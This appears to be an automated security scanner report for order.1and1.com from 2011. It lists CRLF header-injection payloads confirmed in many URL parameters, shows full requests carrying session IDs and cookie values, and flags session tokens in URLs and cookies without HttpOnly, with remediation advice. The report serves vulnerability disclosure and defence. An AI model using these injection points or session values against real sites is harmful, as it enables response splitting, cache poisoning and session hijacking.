Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of the jsessionid request parameter is copied into the Location response header. The payload ed455%0d%0a503217b4f8d was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_toped455%0d%0a503217b4f8d&linkId=hd.log.eue&site=PU.WH.US&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of the linkId request parameter is copied into the Location response header. The payload c29e1%0d%0a97b1abda1ab was submitted in the linkId parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=c29e1%0d%0a97b1abda1ab&site=PU.WH.US&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of the linkOrigin request parameter is copied into the Location response header. The payload a5802%0d%0a86591ee57c3 was submitted in the linkOrigin parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=hd.log.eue&site=PU.WH.US&origin.page=Hosting&linkOrigin=a5802%0d%0a86591ee57c3&linkId=hd.log.eue HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
2.4. http://order.1and1.com/xml/order/Jumpto [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://order.1and1.com
Path:
/xml/order/Jumpto
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload b9161%0d%0a0390bad3044 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=hd.log.eue&site=PU.WH.US&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue&b9161%0d%0a0390bad3044=1 HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of the origin.page request parameter is copied into the Location response header. The payload 2e03b%0d%0ad348ca74978 was submitted in the origin.page parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=hd.log.eue&site=PU.WH.US&origin.page=2e03b%0d%0ad348ca74978&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of the page request parameter is copied into the Location response header. The payload d57be%0d%0aa073224f42f was submitted in the page parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=ngh&site=PU.NGH.US&origin.page=Hosting&page=d57be%0d%0aa073224f42f&linkOrigin=Hosting&linkId=ngh HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of the site request parameter is copied into the Location response header. The payload 6bf4e%0d%0a357848c4060 was submitted in the site parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=hd.log.eue&site=6bf4e%0d%0a357848c4060&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of the sourcearea request parameter is copied into the Location response header. The payload 29bf0%0d%0ad43926d593f was submitted in the sourcearea parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&origin.page=Hosting&linkId=weiter&site=PU.NGH.US&page=switch&sourcearea=29bf0%0d%0ad43926d593f HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of the __lf request parameter is copied into the Location response header. The payload ab024%0d%0acfe55b3b16 was submitted in the __lf parameter. This caused a response containing an injected HTTP header.
The value of the jsessionid request parameter is copied into the Location response header. The payload e4fdd%0d%0a682e1dc8167 was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.
The value of the __lf request parameter is copied into the Location response header. The payload 70f82%0d%0ae7e5d5b7eec was submitted in the __lf parameter. This caused a response containing an injected HTTP header.
The value of the jsessionid request parameter is copied into the Location response header. The payload 1fd04%0d%0a0cd46c6d446 was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top1fd04%0d%0a0cd46c6d446&__sendingdata=1&packageselection=Hosting&cart.action=add-bundle&cart.bundle=tariff-home-package-bundle HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
GET /links;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Response
HTTP/1.1 302 Found Date: Sun, 20 Mar 2011 18:53:27 GMT Server: Apache Location: http://order.1and1.com/links/?__frame=_top&__lf=Static Vary: Accept-Encoding Content-Length: 307 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://order.1and1.com/links/?__frame=_top& ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=7f633103f81ccc00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ac-whom-us=OM.US.USa02K18619H7072a
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /xml/order;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.about HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=40ed56ac00b05400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/AboutUs HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=5ace75f3e6dc4c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
